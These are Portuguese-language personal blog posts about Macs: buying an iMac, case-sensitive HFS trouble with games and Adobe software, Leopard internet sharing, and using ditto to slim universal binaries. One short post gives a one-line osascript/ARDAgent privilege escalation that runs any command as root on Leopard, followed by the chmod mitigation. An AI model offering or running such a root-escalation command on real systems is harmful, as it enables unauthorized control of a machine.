Back to the Mac

Depois quase 3 anos sem usar mac como sistema principal, comprei um imac 🙂 Me arrependo de não ter comprado antes.

Já falei em outros posts, gosto do hacrdware da apple, ele é bem equilibrado, bonito, funcional e na minha mão, dura muito… Tenho 2 imacs de 98, funcionando, rodando debian… só não uso no dia a dia pq preciso da WEB e seus ajaxes e js usam memória e processador demais pra um G3 233Mhz com 192Mb de RAM. Tenho um ibook, funcionando, com um safari safado, mas funcionando e por ai vai. Meu único produto apple que morreu foi um macbook pro Rev A, que foi o primeiro mac com processador intel a ser vendido…. Por ser um Rev A, era esperado… as vezes ele liga, mas não é confiável.

A apple perdeu um pouco do esmero, lembro de um imac aluminio que tirei da caixa em 2008, ele veio até com flanelinha pra limpar a tela, esse meu, só veio com mouse, teclado, o mac e o cabo…. nada de DVD, controle remoto ou flanelinha.

O que me motivou a comprar um iMac principalmente foram os problemas de hardware dos meus dois computadores domésticos. Meu desktop, de 2008 mas com tecnologia de 2007 que foi por 2 anos um hackintosh de respeito, mas que tinha um problema de limitação de memória (apenas 2gb sem possibilidade de expansão). Com o tempo ele ficou muito lerdo pra rodar o Leopard, troquei por um linux, mas como uso muitas maquinas virtuais ficou inviavel.

A outra máquina é um dell studio, máquina que me arrependo de ter comprado, apesar do processador potente o resto não acompanha, teclado mole, tela com cores ruins, som péssimo, HD lerdo e bateria que arriou com menos de 2 anos… nas ultimas semanas a rede tanto por wifi quanto por cabo se tornaram intermitentes… não importa o SO, um fiasco. A gota ficou pela atualização do driver proprietário da AMD/ATI, ela abandonou o suporte a minha placa, e o driver livre não presta… Já passei por isso antes, daqui a alguns releases do kernel o driver velho não vai compilar mais, e eu vou ficar na mão … Acho que usar um windows 7 com cygwin é um final mais digno pro notebook.

Enfim, não desisti do linux, onde ele funciona sem me encher o saco ele continuará sendo usado, como no meu netbook, mas o imac me traz uma estabilidade, tenho garantia pelos próximos 3 anos, e pelo menos mais 5 anos de suporte ao sistema operacional pela apple, e após esse período ele será uma workstation bacana rodando um linux leve pra máquinas antigas.

Minha fase de sair recomendando macs a torto e a direito passou, mas me traz uma satisfação enorme dizer que daquela época pra cá, temos 3 sistemas operacionais decentes tanto pra users avançados quanto iniciantes, tá de saco cheio de um vai pro outro, sem frescura, simples assim.

 

 

 

 

Ownando um MAC OS X Leopard com um comando

Dizem que o OSX é mais seguro que a concorrência, acho que não 🙂 Abra um terminal e digite :

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Isso mesmo, troque o whoami por qualquer outro comando e execute como root .

Agora vamos resolver o problema e eliminar a ameaça :

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Mas não vale Reparar as permissões , ou ele volta com a falha de segurança !!!

Mac OS X pisa na bola

Eu sou um entusiasta do sistema da apple , e o Leopard me deixou tão satisfeito que não tive coragem até agora de particionar o HD do meu macbook pro pra instalar linux. O sistema praticamente não da trabalho, um update aqui e ali, raros
travamentos, desempenho razoavel (linux assasina o OSX quando o assunto é desempenho e bateria), mas quando resolve me pentelhar faz bem feito.


Já formatei meu notebook 3 vezes, uma quando comprei, outra quando notei que após 3 migrações de notebooks estavam fazendo mal ao meu sistema ( do ibook pro powerbook e agora pro macbook), e agora por problemas com Utter Crap HFS .

Quando fiz o segundo format eu notei que meu sistema antigo estava configurado para ser Case-Insensitive, ou seja “Isso==iSSo”. Como minha escola é Unix pra mim nada mais natural do que usar um sistema Case-Sensitive onde “iSSo é diferende de IssO”, pena que os desenvolvedores de software pra plataforma não sabem disso. Logo após restaurar minhas tralhas do backup notei que meu Warcraft III – TFT não tava mais rolando, reclamava de arquivos faltando, fui corrigindo o case dos nomes dos arquivos um por um, e quando notei que eram centenas, fiz um script mas foi inútil pois a Engine do jogo não segue um padrão ao chamar os arquivos…. A minha solução foi criar uma imagem de disco Case- Insensitive e botar o game dentro. Deu certo, e a vida continuou.

Nas crises da vida, notei que se eu quiser ter um futuro conjulgal terei que lidar menos com a máquina e mais com sentimentos, emoções e arte. Então decidi voltar a desenhar e tentar a sorte profissionalmente no médio prazo… Então nada mais natural do que dominar as ferramentas básicas padrão do mercado. Domino bem o Gimp e o Inkscape, e sei que eles tem limites, mas nunca instalei um illustrator ou photoshop na vida e sei que eles tem virtudes. Após um interminavel download do site da Adobe quando fui instalar a versão Trial do Flash :

cs3error

 

Pra não cair no problema do Warcraft a Adobe simplesmente limou o suporte ao HFS Case-sensitive, pensei comigo que seria possível usar a mesma estratégia do Warcraft, criando uma imagem de disco e jogando tudo dentro… Errei ! Tive que reformatar meu HD usando Case Insensitive pra evitar futuros problemas. O problema não tem outra solução, e segundou alguns MacAcos velhos que conheço esse tipo de incompatibilidade sempre rolou.

É como eu disse, quase não da trabalho, mas quando da normalmente é perda total 😛

Compartilhando wifi com Leopard

Ok, parece ridículo, mas levei 2 horas pra descobrir que compartilhar rede usando o Leopard é ridículamente simples, mais fácil que no Tiger. Então vamos lá :
System Prefs > Sharing > Internet Sharing, escolha o wifi como fonte de internet, e marque os dispositivos que serão beneficiados com a rede, ou seja, firewire, ethernet, bluetooh etc…
Apó essa configuração as máquinas clientes devem ser configuradas pegar o IP por DHCP.

Eu demorei tudo isso, simplesmente porque no linux além de usar os comandinhos básicos normalmente os ips do cliente são criados estaticamente, ou seja, eu estava configurando os clientes para uma rede que não existia…. Só depois vi que o Leopard cria automaticamente os aliases nos devices e de quebra levanda um mini-dhcp server para os clientes…

Levando o macbook pro aos limites !

Um belo dia encontrei no google uma referência ao meu artigo sobre o Xslimmer /Ditto no blog macmagazine desde então passei a participar do fórum e do blog. Então encontrei esse post que mostra um vídeo de um macmini rodando 50 aplicativos ao mesmo tempo… Não me contive e em uma chuvosa manhã de sábado fiz o mesmo, mas com mais de 100 aplicativos, seguem os screenshots :




Ok, a máquina ficou por volta de 30 minutos sem responder, o HD do macbook pro é muuuuito lerdo PQP ! Mas não travou 🙂 E ainda consegui trabalhar nela por algumas horas… depois de fechar todos os apps, a memória voltou ao normal, sem memory leaks, um feito !

Alternativa ao xslimmer

Quem conheceu o OSX na era Intel não deve perceber, mas quem veio do mundo PPC notou que os binários universais são monstruosamente grandes com o dobro ou até mesmo o triplo de um binário dedicado.
Com a morte do meu powerbook peguei um mac intel portatil, com hd de 100 Gb que não da pra nada, e agora sofro com problemas de espaço em disco… Então encontrei um software chamado xslimmer que faz uma lipo nos binários gordos retirando o código PPC deixando apenas código intel 🙂 Uma maravilha se o excelente programa não fosse um shareware 🙁

Mac como um bom macmaniaco com conhecimentos Unix, não me conformei e fui buscar uma solução caseira, e encontrei o ditto, uma ferramenta para gerenciar os aplicativos do OSX, com ele é possível customizar, configurações, línguas, ícones e também a arquitetura dos binários , saca só o comando :


ditto --rsrc --arch i386 /Applications/RealPlayer.app /Applications/RealPlayer-intel.app

Então após se certificar que o novo app está funcionando basta apagar o antigo. Só pra se ter uma idéia da economia, eu usei o ditto no Pages e o binário de 700 mb caiu pra 200 mb… Em outros casos a economia foi ainda maior chegando a 4 vezes, não me pergunte porque.

Pra mim é assustador como o mercado de pequenos aplicativos para o OSX se sustenta em cima de frontends para softwares de linha de comando, são vários exemplos, tem desde rsyncs e wgets até tweaks em configurações de arquivos xml, é impressionante a quantidade de grana que você pode economizar por dominar meia dúzia de comandinhos do terminal.